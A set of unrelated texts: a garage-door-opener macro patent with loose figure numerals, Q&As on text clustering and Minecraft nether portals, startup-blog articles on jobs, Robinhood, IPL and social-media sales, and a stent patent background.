Furthermore, a present state of the operator may be recorded and the operator may be returned to the state whenever the macro is executed. For instance, the present state may be a barrier closed state and whenever the macro is called, the operator may return the barrier to the closed state.
Thus, a system and method is provided that allows a user to customize the functions that are provided at a moveable barrier operator. The approaches described herein are simple and cost effective to implement and expand the number of functions that can be performed at the operator. User satisfaction with the system is enhanced since the approaches described herein allow the user to tailor the functions of the operator to the lifestyle and requirements of individual users.
Skilled artisans will appreciate that elements in the figures are illustrated for ease of understanding and have not necessarily been drawn to scale. For example, the dimensions of some of the elements in the figures may be exaggerated relative to other elements to help to improve understanding of various embodiments of the present invention. Also, common but well-understood elements that are useful in a commercially feasible embodiment are often not depicted in order to facilitate a less obstructed view of the various embodiments of the present invention.
FIG. 1
102
110
110
104
110
106
114
104
104
110
110
Referring now to the drawings and especially , a system and method for programming and executing macros in a moveable barrier operator system is described. A transmitter is used to actuate a moveable barrier operator , which, in the present example is a garage door opener. The operator is used to move a barrier , which, in this case, is a garage door. The operator is situated in a garage and includes a light to allow a user to see in minimal light conditions. Although the barrier is described herein as being a garage door, it will be understood that the barrier can be any type of moveable barrier such as a gate, swinging door, sliding door or shutters. In addition, although the operator is described as being a garage door opener, it will be understood that the operator may be any type of moveable barrier operator such as a gate operator or a swinging door opener. Other examples of barriers and barrier operators are possible.
108
110
112
108
116
118
120
122
118
114
110
A wall unit is coupled to the operator via a cable . The wall unit includes switches (that allow a user to input information into the system) including a macro switch , a light switch , a light switch , and a command switch . The macro switch is used to program macros into the operator as described elsewhere in this specification. The light switch is used to activate and deactivate a light , which is attached to the operator .
110
103
104
110
104
Other devices may also be coupled to the operator . In one example a motion-detecting passive infrared (PIR) sensor is used to detect motion in front of the door . The detection of motion indicating the presence, for instance, of a vehicle, may be used by the operator to make actuation decisions regarding the door .
108
Users may program function sequences into the wall control unit and these function sequences are associated with a macro. For example, the user may program a macro that executes a command to open the door, waits for a predetermined delay period, and then executes a close command to close the door once the delay period has expired. In another example, a macro could be programmed to wait for a delay period and after the delay expires, the garage door could be opened with a command. In still another example, a macro could be created that first opens or closes the door, waits for a delay period, and, after the delay expires, turns off the light at a period different than the original time setting. In yet another example, a macro can be formed to open the door, flash the light on and off, and the close the door. In another example, a macro can be programmed to detect a user with the detector, wait for a delay period after the detection, turn on the light, wait for another delay period, and then open the door. Other examples of macros are possible. Furthermore, it will be appreciated that any number of actions can be associated with a macro and these actions may be performed in any sequence.
108
116
116
116
116
FIG. 1
The wall control unit may be structured in various ways to facilitate macro programming. In the example of , the macro switch is pushed and held for a certain period of time to begin programming the macro. Then, the operator records the sequence of events that comprise the macro. For example, the user may turn on the light, open or close the door, or wait for a delay period. After programming the macro is complete and the operator has associated the events with the macro, the user again depresses the macro switch and holds it for a certain period of time to signal to the operator that the macro is complete. In this example, the macro switch is held for a minimum amount of time so that the system can distinguish between attempts to program a macro and execute a macro. Subsequently, when the macro switch is pressed, the macro is automatically executed by the operator.
108
102
102
Alternatively, two dedicated switches or buttons (one for initiating and the other for terminating the macro) can be used on the wall control unit during macro programming. In still another example, a key pad may be used to initiate the programming of the macro. In yet another example, the macro function can be mapped to the transmitter . For instance, different buttons or combinations of buttons may be used on the transmitter to program the macro (such as all or some of the buttons on a wall control unit). Other examples of devices and approaches may be used to program the macro at the operator.
110
The present state of the operator may also be recorded and used. For example, the present state of the operator (e.g., door open) may be recorded. When a macro function is called, the operator may return to the recorded state. In another example, a change in present state may be used to initiate the macro. For instance, the original state of the operator may be “radio signal not detected” and this may change to “unknown radio signal detected” at a later time. In this case, the initiation of macro may be mapped to the activation of the transmitter (that causes the state of the operator to change).
The present state may be a barrier stopped state, a barrier open state, a barrier partially open state, a light-on state, a light-off state, an obstruction-detection state, an obstruction non-detection state, a person detected state, a person non-detection state, a known-radio-signal detection state, a known radio detection non-detection state, an unknown radio signal detection state, or a radio signal non-detection state. Other examples of states are possible.
In addition to directly programming the macro, macros can be preprogrammed and downloaded to an operator. For example, a pre-programmed macro (comprising a sequence of preprogrammed functions) may be programmed at an outside programming source and then downloaded into a memory at an operator. Specifically, macros may be downloaded directly from a computer or placed on some storage media before being downloaded to the operator.
FIG. 2
a,
200
208
208
200
202
204
206
208
202
202
208
214
212
Referring now to one example of a wall control unit is described. The wall control unit includes a start programming button and an end programming button . The unit also includes three macro buttons , , and . The user presses the start programming button and the macro button to program a first macro into the system. Alternatively, the macro button and the start programming button may be pressed simultaneously. Then, the user may execute the steps of the macro and these are recorded by the operator. For example, the user may execute an open the door command with the command button and control the light with the light button .
210
202
202
202
Once the programming of the macro has been completed, the user presses the end programming button . This signifies that the programming of the macro is complete. Then, the macro associated with the pressing of the macro button is stored in a memory of the operator. At a later time, when the macro button is pressed, the macro is executed. Using the macro of the preceding example, the user presses the button and the door opens and the light is activated.
FIG. 2
b,
220
220
228
222
222
222
228
232
230
Referring now to another example of a wall control unit is described. The wall control unit includes a programming button to begin the programming of a macro. After the programming button is pushed, then the macro button button may also be pressed to signify that the steps that follow are to be associated with the macro button . Alternatively, the macro button and the programming button may be pressed simultaneously. Then, the user may execute the steps of the macro and these are recorded by the operator. For example, the user may execute an open-the-door command with the command button and turn on the light with the light button .
228
228
222
222
222
Once the programming of the macro has been completed, the user again presses the programming button . The pressing of the programming button for the second time signifies that the programming of the macro is complete. Then, the macro associated with the pressing of the macro button is stored in a memory of the operator. At a later time, when the macro button is pressed, the macro is executed. In the preceding example, the user presses the button and the door opens and the light is controlled.
226
226
In another example, a macro button can have unique features. A macro button may be associated with the unique feature that execution of the macro is dependent upon the state of the operator. In this example, the state may be the state of the barrier. If the macro is programmed when the barrier is in the open state, any macro learned to that button will only activate when the barrier is open. This makes a first operate command in the macro cause the barrier to move towards a closed position.
FIGS. 2
FIG. 1
a
b
2
It will be understood that the wall control units shown in and are only examples. For example, as shown in , the wall control unit may not contain programming buttons. The wall control unit may have only macro buttons, which are used both to program the macros into the system and execute the macros once the programming has occurred. In addition, a button on a transmitter may be used as the macro function button for initiation and/or programming of the macro. Other examples of wall and other types of control units and programming arrangements are possible.
FIG. 3
FIG. 3
a,
b
302
320
318
304
302
304
304
306
Referring now to one example of an operator is described. The operator comprises a receiver , controller , and memory . The receiver receives transmissions from a portable transmitter that are used to actuate the operator . The memory may be any suitable memory structure that is used to store information. The memory stores a table (described below with respect to ) that represents one implementation example of a macro.
318
306
304
318
306
306
306
306
318
318
306
306
The controller is coupled to a wall control unit (not shown) and receives signals from the wall control unit. The wall control unit is used to program macros that are stored in the table in the memory . For example, the wall control unit may include a macro button. The macro button is pressed and held for a certain amount of time creating a signal that is sent to the controller . In response, the controller creates the table (if the table has not been created) or prepares the table so that new entries can be added to the table . Operations are then performed and these are recorded by the controller . For instance, the user may press a light switch on the wall control unit to activate a light or may push a command button to open or close a door. In this example, the controller then adds entries into the table relating a macro name or identifier to the sequence of events associated with the macro. Thus, when more than one macro exists (as in this example), the macro name or identifier may be used as an index to access the correct macro in the table .
FIG. 3
b,
306
306
308
310
308
1
2
3
310
1
2
3
306
312
314
316
312
314
316
312
1
1
2
3
314
2
2
3
316
3
2
3
1
2
3
318
306
Referring now to one example of the table that is used to define macros of function sequences is described. The table includes columns and . The column includes a macro identifier, for example, macro identifiers M, M or M. The column identifies functions, for example, functions F, F, and F. The table also includes three rows , , and . The rows , , and each define a macro by relating a macro name or identifier to the functions or events comprising the macro. For instance, row defines that macro M includes the performance of functions F, F, and F. Row defines that macro M includes the performance of functions F and F. Row defines that macro M includes the performance of functions F and F. In one approach, the functions (e.g., F, F, F) in the table may be codes that cause the controller to perform the functions. In another example, the functions may be pointers to programming routines that perform the functions. The functions may be arranged in order of performance or other information may be included in the table that shows the order of performance. It will be appreciated that the table is only one example of how functions may be associated with a macro. For example, other programming structures or combinations of programming structures may be used. In addition, the macro need not be represented as a table, but may be represented as hardware components or combinations of hardware and software components.
FIG. 4
FIG. 3
FIG. 3
a,
b
b.
402
404
Referring now to one example of an approach for programming a macro is described. In one example, this programming can include creating and populating a table (such as the table of ). At step , a user initiates the programming of a macro. For example, a user at a wall control unit may press a macro button, initiate programming button, or programming button to signal to the operator that the user desires to program the macro. At step , the events and/or actions that comprise the macro are recorded. For instance, the user may perform various functions in a certain order such as turning on the light, opening the door, closing the door, and waiting for a delay time. These events and/or actions are recorded by the operator and associated with the macro. As mentioned, in one approach, the association may include representing the macro as a table such as that described above with respect to
406
408
402
At step , the macro programming is terminated. This may be accomplished in a variety of ways, for instance, by the user pressing the macro button again, pressing a dedicated terminate programming button, or pressing the programming button again. At step , it is determined if any more macros are to be programmed. If the answer is negative, execution ends and if the answer is affirmative execution returns to step as described above where more macros can be programmed.
FIG. 4
FIG. 3
FIG. 3
b,
b
b
410
412
410
Referring now to one example of an approach for an operator to execute a macro is described. At step , the operator receives a command to execute the macro. This may be accomplished by the user pressing a button or combination of buttons that executes the macro. In one implementation, the pressing of the button creates a macro identifier, which is used as an index in other steps to locate a macro in a table (such as the table illustrated in ). At step , the operator performs the functions associated with the macro. For example, if a table similar to that of is used to define the macro, a lookup may be performed using the macro name or identifier (created at step ) as an index. Specifically, the index may be used to locate the appropriate macro (associated with a row) in the table. Once the macro is located in the table, the functions related to the macro are obtained and may be performed by the system. Other approaches not utilizing tables may also be used.
Thus, approaches are provided that create and execute function macros at a moveable barrier operator. The approaches described herein are efficient and simple to execute since users do not have to manually input and execute each function they wish to perform. In addition, the functions performed can be tailored to fit the needs of users.
While there has been illustrated and described particular embodiments of the present invention, it will be appreciated that numerous changes and modifications will occur to those skilled in the art, and it is intended in the appended claims to cover all those changes and modifications which fall within the true scope of the present invention.
BRIEF DESCRIPTION OF THE DRAWINGS
FIG. 1
is a block diagram of a system that allows the programming of macros in a moveable barrier operator according to the present invention;
FIGS. 2
a
b
2
and are block diagrams of wall control units allowing for the programming of macros in a moveable barrier operator according to the present invention;
FIG. 3
a
is a block diagram of a moveable barrier operator that can be programmed to program and execute macros according to the present invention;
FIG. 3
FIG. 3
b
a
is a block diagram of a table stored in a memory unit of the operator of according to the present invention;
FIG. 4
a
is a flow chart of the operation of programming macros into a moveable barrier operator according to the present invention; and
FIG. 4
b
is a flow chart for executing macros that are stored in a memory at a moveable barrier operator according to the present invention. | |
Q:
Benefits of clustering algorithms and Latent Dirichlet Allocation / topic models for finding clusters of words / topics in text
I am interested in finding clusters of words / topics in text. I am trying to learn more about potential approaches. The Wikipedia page on document clustering seems to provide a helpful overview (although I am sure there are limitations to this article and would be more than happy to be pointed to other resources).
In a research project, I've been using a two-step clustering approach (hierarchical and then k-means) with some degree of success but am interested in better understanding the landscape.
The Wikipedia article referenced above distinguishes between 'hard' and 'soft' approaches. According to it, hard approaches, such as hierarchical approaches and k-means, assign documents to a single cluster, while soft clustering approaches (the article says that both Latent Drichlet Allocation and topic models are examples of this approach) assign a mixture of clusters to a document.
As a caveat, I'm not sure how Latent Drichlet Allocation and topic models can be considered clustering approaches (or whether they are), but my question is, what are the benefits to 'hard' and 'soft' approaches?
In short:
What are the benefits of using hierarchical and / or k-means clustering algorithms to identify clusters of words / topics in text?
What are the benefits of using Latent Drichlet Allocation / topic models to identify clusters of words / topics in text?
A:
A classical clustering algorithm (like k-means or hierarchical clustering) gives you one label per document.
Topic modeling gives you a probabilistic composition of the document (so a document has a set of weighted labels). In addition, it gives you topics that are probability distributions over words.
Note that both procedures are unsupervised learning and far from being perfect, no matter how impressing the results may look at first sight. Apply them to dataset you understand well first!
| |
Often times, there are points in life where you are stuck between a tricky situation and where you don’t know what to do to get out of the fix. When you work at a place for a long time, you are sometimes faced with the want to quit without realising the bigger impacts of what happens when you quit your job. In order to jump to the other side of the hoop and realise why you shouldn’t really quit your job, we have figured out a list of reasons for you!
1. You need a better perspective on your situation
Many a times, when you seem to involved in the that is happening at work, you don’t realise why it’s happening. When this happens, take a step back and understand why things are going wrong. Before you decide to quit, put pen to paper and think about whether you really have put in enough effort into the job. Think about what is not working for you:
- Is it your boss?
- Is it the kind of work you are doing?
- Is it your colleagues?
Talk to someone outside your immediate circle to see what the issue could be and once you have realised the problem, work on how to change the situation for yourself. Immerse yourself in the experience of finding perspective and only when you work through the kinks, can you try to think of what to do next. Don’t quit without finding perspective.
2. You need to fix the broken bridges
Usually, when you are at the brink of quitting your job, it is because things have either not been working or have gone so wrong, there is no fixing the situation. At times like this, you have fought so much with your colleagues and friends, you think there is nothing you can do or say to fix the situation. However, if it does come to this point, know that quitting isn’t the only solution to the problem. Just because nothing seems to be going the right way at work, quitting shouldn’t be the solution. Fix what you have broken, even if it takes time. In the long run, the relationships you build with people at your workplace are the most important and meaningful ones.
3. You could miss out on some truly great learning opportunities
If you want to quit your job because of how hard it is, then think again. Sometimes, the toughest situations in life are the ones which help you get the most perspective on your surrounding. When you feel misplaced and out of your comfort zone, the easiest solution seems to be to quit. However, the easiest path is rarely ever the best one. These questions need to be on your checklist:
- Are you more capable of making tough choices this week than the week earlier?
- Do you think you can do better with support and help from your colleagues?
- Are you learning skills which will help you grow not just in your career but in your life as well?
While these may seem like tough questions to answer in the beginning, the quicker you deal with them, the better you can come to terms with why you shouldn’t quit. While the alternative of staying is far harder than you are ready to deal with, the rewards at the end of the day are going to be worth the struggle.
4. Your resilience may lead to your success
Studies show, the more resilient you are, the more you learn and the more you grow from the mistakes you make. Before you take a moment to quit, think about what you are learning from the challenges thrown at you every day. Accept that nothing in life comes easy and that through all the tough things, you have to push through to get to the greener side of things.
5. Life isn’t a race
Sometimes, when things just aren’t going the right way, one needs to realise that nothing about life is a race. It’s important to realise there’s no big finish line you have to get to at a particular time. Move through your goals, realise your plans and narrow down your reasons for doing what you are. Only then will things fall into place.
Work isn’t always meant to be fun and games. It is about making do with the tougher choices and decisions and you realising you learn from the backlashes and pitfalls. However, even after all of this, if your instinct is still telling you to quit, write that letter!
Leave a Reply
How To
How Does Investment Startup Robinhood Make Money?
If you are an avid follower of news on the social media platform Twitter, chances are you might have read about GameStop and how a group of Redditors took on Wall Street hedge fund billionaires. It all started when a Reddit user found Melvin Capital, a hedge fund company was shorting the GameStop stocks. An analogy would be if a person x wants to buy 5 bananas which are being sold at INR 10 in the market, and another person y already purchased 5 bananas. X could borrow y’s bananas for a while and sell them with the hope the price will go down below INR 10. Then x will purchase 5 bananas for a lesser price than INR 10 and give back the bananas to y thereby making a profit, in the difference of buying price. A group of Redditers noticed what hedge funds were doing with GameStop stock and decided to buy all the available shares in the market which in turn led to stock value soaring through the roof. Now imagine the bananas as GameStop stock and x is the hedge fund. Now hedge funds have to return the borrowed shares but since they already sold, they had to buy it for a larger price than they hoped. This in turn led to more than $ 5 billion in losses for hedge funds because they were shorting the GameStop stock.
However, Robinhood, the zero commission investment and trading startup found itself in the midst of the storm. This is because thousands of normal small investors wanted to purchase the GameStop stock and they did it via Robinhood. Wall Street was not happy with the way a group of Redditors held hedge funds by their collars and lobbied to have the stocks delisted.
Mounting pressure from the Government and Wall Street forced Robinhood to delist GameStop, AMC and Nokia stocks from their trading roster which in turn led to huge customer backlash and lakhs of 1 star reviews on app stores of Apple and Android.
Background
Robinhood was founded by Stanford University graduates Baiju Bhatt and Vlad Tenev co-founded the company in 2013, with the aim of democratizing finance and making it more accessible to young and less affluent investors. This was due to trading being carried on commission based platforms like ETrade and TD Ameritrade and by a very small set of people. What made the app so attractive to the normal public was the ease of using the platform and its zero commission slogan. More importantly, Robinhood made the appeal of trading fun and interactive for the general public and the working class. Investment applications normally charge a nominal fee or commission on the execution of any successful trade.
However, the app gained huge traction in 2019 just when the COVID-19 pandemic hit the world. Stock markets crashed suddenly, wiping out billions of dollars in investor wealth. However, this phase saw the rise of a new kind of investor. Americans were given $ 1200 stimulus cheques to protect them from the economic fallout of COVID-19 pandemic. Armed with these cheques, millions of trading novices began investing in the stock market via Robinhood.
ALSO READ: How Does WhatsApp Generate Revenue
Revenue model
How does a startup which calls itself a zero commission brokerage earn revenue and manage to be profitable? Robinhood was designed to make profits by selling the customer trading data to several investment firms on Wall Street. This practice is known as high volume order flow. In financial markets, payment for order flow refers to the compensation that a broker receives, not from its client, but from a third party that wants to influence how the broker routes client orders for fulfillment. It is not illegal but it is often frowned upon, to use this strategy as it is also called a ‘kickback.’ This accounts for a lion’s share of revenue for Robinhood.
The second revenue generator is through interests. Robinhood makes money from interest made by lending out investor’s idle cash. Robinhood lends out uninvested cash sitting idle in customer accounts.
The third revenue generator is Robinhood Gold, the company’s premium account, allows investors up to $1000 of margin thereby allowing them to trade with more than they have in their cash balance on the app.
While Robinhood has been caught in the middle of a nasty war between Wall Street and retail investors, there is no denying the fact that it changed the way people invest in the stock market.
Articles
How Do IPL Franchises Make Money
If there is one thing that every Indian and every cricket fan waits for all year, it is the Indian Premier League, which is the world’s biggest cricketing league. Professional cricket players from all over the world vie to get selected by one of the eight franchises which compete in the league. The entire league is a star studded affair and Indians manage to forget their differences and band together for all the time the league is aired. Each franchise boasts of a loyal fan following who have supported their teams through thick and thin ever since IPL was inaugurated in 2008. While the entire league is a melting pot of entertainment and competition, have you ever wondered how the franchises make money in IPL? In this article we will decode the business models behind the IPL teams and how they earn money.
Franchises need to bid for players every year before the start of the IPL season in an auction. Each franchise has a maximum spend limit of Rs. 80 crores to buy players in the auction. Apart from buying players each franchise also needs to bear the cost of travel, support staff and logistics. The following are the different avenues from which franchises earn money.
1) Sponsorships
Franchises earn a major chunk of their revenue from sponsorships, but they do not get the money from sponsorships directly. The IPL governing council gets money from sponsors and in the case of this year it is from Dream 11, which is the title sponsor while VIVO was the title sponsor last year. All the money which is earned from sponsorships is divided into a ratio of 60:40 with the Board of Control for Cricket in India (BCCI) retaining 40% of the sponsorships. The remaining 60% is distributed among the ten franchises. BCCI owns and operates the IPL in India. The ratio of distribution might change in the coming years depending on the decisions taken by the BCCI.
2) Media rights
Broadcasting companies bid for the media rights and the winning bid will get to air the IPL on their channel. Star India bagged the media rights for IPL with a bid of Rs. 16,345 crores for five years (2018-2022.) The money from media rights are also distributed in the 60:40 ratio with BCCI keeping 40% and the franchises getting an equal distribution from the remaining 60%.
3) Franchise sponsors
Each franchise has its own dedicated sponsors which pay a huge amount of money to the franchise. The logos and names of the companies which you can see on the sporting attire of every IPL team are actually the dedicated sponsors of their respective franchises. The profit from dedicated sponsors depends on the deal the franchise has made with their sponsor. The income generated from dedicated sponsors might differ from team to team.
ALSO READ: 5 Cricketers Who Are Entrepreneurs
4) Sale of tickets
Each franchise can choose a home ground from the available venues in the BCCI roster like Sunrisers Hyderabad, choosing Hyderabad and Kolkata Knight Riders choosing Kolkata. Only the home franchise can fix the price of tickets for the matches happening in their home ground. Bigger stadiums with large seating capacity earn the most from ticket sales. Kolkata Knight Riders home ground Eden Gardens has the highest seating capacity in India and therefore KKR earns the most from ticket sales.
5) Merchandising
Each franchise makes some money by selling official jerseys, caps, wrist watches, souvenirs etcetera. The merchandise is sold through the official franchise websites.
6) Prize money
Franchises battle it out in a long season to become the winner of the IPL season. The winning team also wins a hefty prize money which is an additional source of revenue. In 2019, the winning franchise won Rs. 15 crores while the runner up won Rs. 10 crores.
IPL is a big stage for franchise owners to earn their revenues as well as the perfect opportunity for players to make their mark and win big auctions. This is how franchises earn their revenues from the IPL. As this year’s edition is off to a flying start, IPL has been a blessing in disguise for millions of Indians in the gloomy times we currently are experiencing.
How To
How To Generate More Sales On Social Media
If you are a frequent Instagram user, there is a high likelihood of stumbling upon a business ad which interests you. There are also high chances of you making a purchase from a business whose ad you might have seen on Instagram. As the social media penetration into our daily routine gets deeper each day, businesses are realising the opportunity to sell their products on social media platforms like Instagram, Facebook, Twitter and Snapchat to name a few. In the current day and age social media is one of the top avenues to generate solid sales and also gives a good return on investment. However, figuring out a good approach for a business does not come easy and requires some time and effort to figure out how a social media platform works. In this article, we explain some simple techniques to generate more sales on social media. A good organisation which has a proven track record in this arena is Whacked Out Media based out of Hyderabad.
1) Understand where the target audience is:
It is very important to understand what social media platform your target audience uses. If your target audience prefers to use Instagram over Facebook, then it makes sense your ads should be running on Instagram. The easiest way to find out where your target audience is is by identifying the right hashtags which are relevant to your product or business and find out where it is being used. Once a business understands where their target audience is, it will be much easier to drive online sales. Online streaming platforms like Netflix and Amazon prime Video are known to promote their content on platforms like Instagram and Facebook in order to gain new subscriptions.
2) Working with influencers
Influencer marketing is a form of social media marketing involving endorsements and product placement from influencers, people and organizations who have a purported expert level of knowledge or social influence in their field. Influencers have a very high chance of generating sales on social media for your business. Having an influencer tell a unique story about your brand or product, having influencers give honest reviews about your product or something as simple as an influencer promoting a unique discount code can drive sales effectively. Noted South Indian actress Samantha Akkineni is known to partner with organic food businesses to promote their products.
3) Turn customers into brand advocates
When you make a sale on social media, it is ideal to request the customer to post reviews of your product or service should they like their purchase. This will turn your customers into brand ambassadors and at the same time generate more organic sales. It will be helpful if you can provide relevant hashtags to be used so as to accurately identify leads. Take the case of mobile phone manufacturer OnePlus, which regularly posts or shares their customer photos and product reviews on their social media platforms. OnePlus believes in storytelling through customer testimonials and customer content. #NeverSettle is the hashtag which is most commonly used by the OnePlus brand to identify content relevant to them.
ALSO READ: How To Increase Online Sales Of A Business
4) Share customer generated content
More often than not, if a customer is satisfied with their purchase they will post it on their social media accounts. For a business, identifying these posts and sharing the customer generated content on their own social media accounts will improve the authenticity of their products. Prospective customers visiting your social media page can see honest customer reviews which will in turn bolster chances of a sale. This is also an easy way to increase loyalty with your existing customers, and to add credibility to your brand whenever potential customers visit your social media profiles.
5) Creating content around products/inventory
It is highly recommended to create content around the products which are being sold on social media accounts. For example, if you are a clothing brand, it will be helpful for customers/leads if they see content on how to mix and match various dresses, or what dresses can be worn in spring or summer. This establishes a broader context for your brand and will also boost engagement with prospective customers. This kind of content will also provide a reason for customers to buy your products.
There is no hard and fast way to figure out social media sales and each business should take the plunge themselves to figure out the best approach for themselves. However, the above mentioned tips will definitely help the chances of success in getting sales. Alternatively there are plenty of organizations which provide consulting services to businesses in order to help them with digital marketing and sales.
Recent Posts
- Suki: This Startup Wants To Transform Healthcare With Its Artificial Intelligence Tool
- 5 Successful Indian Startups Founded By Women
- Leher Versus Clubhouse: Which Audio Listening Startup Would You Choose?
- Why Are Ads On Digital Media Failing To Reach The Right Audience?
- Facebook Launches BARS For Creating Raps To Counter TikTok’s Growing Popularity
- How Domino’s Pizza Grew 13000% From 2008 To 2020
- Elon Musk Tweets About Bitcoin Bull Run And Loses $ 15 Billion
- Daily Basket Creates BBisabully Over Being Sued By Big Basket Over Usage Of Basket
- Bike Rental Startup Bounce Goes For A Second Round Of Layoffs Amidst Operations Scale Down
- How Parle G Became An Iconic and Well Loved Indian Brand
- Adidas To Sell Reebok Brand Due To Declining Sales
- Carl Pei’s Nothing Invites Retail Investors
- The Incredible Journey Of Wolfe Herd And The Dating App Bumble Which Went Public
- Alphabet Invests In Carl Pei’s Startup Nothing
- Bitcoin Soars As Tesla Purchases 1.5 Billion Dollars Worth Of Cryptocurrency
- From Unicorn To Bankruptcy; Knotel Bears The Brunt Of COVID-19 Pandemic
- The Journey Of Wine Recommendation App Vivino Which Raised 155 Million Dollars In Funding
- How Does Investment Startup Robinhood Make Money? | https://www.startupstories.in/tips/how-to-get-through-all-the-bad-days-at-work |
Q:
How far away do portals need to be so that they don't go to the same place?
I'm playing on a SMP server and am trying to use the Nether to link up all my disparate bases around the world. Note in the below, A is Overworld, B is Nether.
I started with one portal (A1, thus spawning B1 in the Nether), and then created another portal a ways away in the Nether (B2), hoping it would be near the main area all the other players congregate. It (A2) was pretty close to where I wanted it, but not exactly. I then created another portal a short distance away (A3), which was where I was hoping A2 would land. I then went somewhere in the neighborhood of 400 squares away from where I initially built A1 (in the opposite direction of A2/A3) and created another portal, A4.
One would think A3 and A4 would create B3 and B4 on the Nether side, respectively. However, A4 linked to B1, and A3 linked to B2. The weird part is, A1 is further from A4 than A1 is from A3.
I hope that made any sense. My question is:
How far away do portals on the Overworld map need to be from each other in order to spawn separate portals in the Nether? Or, what are some ways to ensure a new portal won't link to an existing one?
A:
Just make sure there's at least a 1025 blocks distance between your overworld portals:
Likelihood of 2 overworld portals
linking to the same nether portal -
Normal World portals that are within
1024 distance of each other on either
X or Z axis are almost always going to
link to the same Nether realm portal
on initial construction because 1024
translates to a distance of 128 in the
Nether Realm, and the game checks for
existing Portals within 128 "radius"
around the destination (the
257x257x128 box).
(Minecraft Wiki)
You should also note that, in SMP prior to 1.6, portals were bugged for quite some time and needed server mods like Bukkit in order to work. Ask your admins/operators, there may still be some Bukkit plugin running on your server handling the Nether.
A:
How far away do portals on the Overworld map need to be from each other in order to spawn separate portals in the Nether?
If you want portals spawned in the Nether, then lunbook's answer is AFAIK correct and you'll need 1,024 meters (perhaps more due to rounding) between overworld portals to get you a brand new Nether portal.
Or, what are some ways to ensure a new portal won't link to an existing one?
Just because the game won't provide you a new Nether portal within this radius, it doesn't mean the game won't use a better portal if it can find one. So in general what you want to do for every portal after the second is:
Build your overworld portal.
Light it up.
Before entering, press F3 and note down the X and Z coordinates. For example, say I want to make a portal to some underground, underwater stronghold I found while boating around. F3 reads: X: -418, Z: -163 (don't worry about decimals).
Go through.
You should (hopefully!) be at your old portal. You can verify this by going back and forth through it quickly.
Whip out a calculator and divide both coordinates by eight. In my example, −418/8 = −52 and −163/8 = −20 (discard the decimals, but make sure you keep the sign.)
Reach that place with the F3 screen. In my example I mined my way to X: -52, Z: -20.
Build a portal there and apply fire to it.
Try it and, if you didn't mess up, you should be good to go!
What you need to prepare for is if you actually do get a new portal at step 5. That's actually the worse scenario, as now you have to live with the automatically generated portal placement (which might even be encased in Netherrack in all directions!) and somewhow trace back to your existing portals. You should keep a list of notable portals' coordinates noted down to save the long overworld trip back home. A nether map may help, but the constantly rotating cursor really does get in the way
| |
There are several kinds of stents on the market with either balloon expandable or self expanding function. Balloon expandable stents are generally made from a material that can easily be plastically deformed into two directions. Before insertion, the stent is placed around the balloon section at the distal end of a catheter and pressed together to reduce the outer dimensions.
As soon as the stent is brought into the body in the proper axial position it can be expanded and thereby plastically deformed by pumping up the balloon. In this final position, the stent is at its largest diameter and should function to support the surrounding tissue, preventing an undesired shape change into a much smaller diameter, at least locally.
Therefore, the stent needs to have sufficient rigidity in the radial direction, but also some flexibility in the axial direction when it is in the final position. Further, the amount of material should be as small as possible and in the inner surface of the stent should not obstruct the flow through the channel (e.g., for blood) or cause too much turbulence.
Problems that generally occur with these stents are as follows: After compressing the stent to its smallest diameter around the balloon, the stent will always have some elastic spring back to a sightly larger diameter, which can cause problems when the catheter is brought into the patient""s body. In addition, the axial friction between balloon and stent can become so small that the stent slips off the catheter. Further, a larger size stent is typically a disadvantage.
A further problem is the so called recoil of these stents. This means that after expansion by the balloon pressure, the outer diameter will always become slightly smaller as soon as the balloon is deflated. This degree of recoiled can be as much as 10%, which can cause migration of the stent.
A different type of stent is made of a more or less elastically expanding structure, which has to be held on the catheter by some external means. An example of this type is a stent that is held in its constrained state by a delivery sheath, that is removed at the moment that the stent should deploy to its natural form.
Some of these stents are made of shape memory material with either superelastic behavior or temperature sensitive triggering of the expansion function.
A disadvantage of these self-expanding stents is the need for the delivery sheath, causing a larger insertion diameter. The removal of the sheath also requires a sheath retraction mechanism, which has to be activated at the proximal end.
Most stents of both types further have the disadvantage of relatively large length change during expansion and a poor hydrodynamic behavior because of the shape of the metal wires or struts.
Another disadvantage of some stents is the positive spring rate, which means that further expansion can only be achieved by higher balloon pressure.
The construction of prior stents is typically made in such a way that the external forces, working on the stent in the radial direction, merely cause bending forces on the struts or wires of the structure.
For example, a unit cell of a Palmaz-Schatz-stent, as produced by Johnson and Johnson Interventional Systems or the ACT One Coronary stent, produced by Progressive Angioplasty Systems, Inc. has in its collapsed condition a flat, rectangular shape and in its expanded condition a more or less diamond-shaped form with almost straight struts (Palmaz-Schatz) or more curved struts (ACT-One).
The shape of the unit cell of such stents is typically symmetrical with four struts each having the same cross section. In addition, the loading of the cell in the axial direction will typically cause an elastic or plastic deformation of all of the struts, resulting in an elongation of the unit cell in the axial direction. These unit cells have a positive spring rate. In stents based upon these unit cells the stability against radial pressure is merely dependent on the banding strength of the struts and their connections.
In this patent application a new type of stent is described with a unit cell, having a negative spring rate and a bistable function. Such a unit cell can also be used in other medical applications. This means that it has two configurations in which it is stable without the need for an external force to hold it in that shape. The unit cell is formed using at least two different sections. One section is less pliable than the other one and acts a relatively rigid support that hinders the shape change of the more pliable section in one direction. In the other direction the pliable section can be deformed, but because of the opposing force from the rigid section, the stability of the pliable or flexible section is strongly increased.
External forces in a direction perpendicular to the most pliable section are distributed to the rigid section and the cross section of the pliable section is merely loaded in compression mode. This makes the construction much stronger than prior stents. In prior stents, all struts have generally the same cross section and mechanical properties and are merely used in the bending mode.
The construction of a stent, based upon this unit cell results in an apparatus, that can easily be elastically compressed around the balloon by finger pressure.
Below a certain critical diameter, the present stent snaps further to a stable, smallest diameter, thus holding the deflated balloon firmly on to the surface of the catheter, with an insertion diameter that is as small as possible. An additional sheath is not required, but may be used for extra safety.
After the stent has been brought into the patient""s body at the proper axial position, the balloon can be inflated until the stent reaches its critical elastic equilibrium diameter. Slightly above this diameter the stent automatically expands further to its final largest diameter, where it reaches its maximum stability against radial pressure. The design enables a constant length large expansion ratio, a reliable expandability and/or a small surface ratio.
A further embodiment of this invention is the possibility of a kind of stepwise expanding stent with a range of stable diameters.
Another part of the invention is a stent with several external diameters along its length, to adapt as good as possible to the shape of the body cavity where it is placed.
Another part of the invention is the possibility to modify the stress and strain pattern in the unit cell by means of a heat treatment in such a way, that the force displacement characteristic of this unit cell becomes asymmetrical or even exhibits a monostable instead of a bistable function, either with the expanded diameter or the collapsed diameter being the most stable condition.
Another embodiment of the invention is the modification of the geometry of the cross section of some struts to achieve the symmetric or asymmetric bistable or monostable force against displacement characteristics of a unit cell.
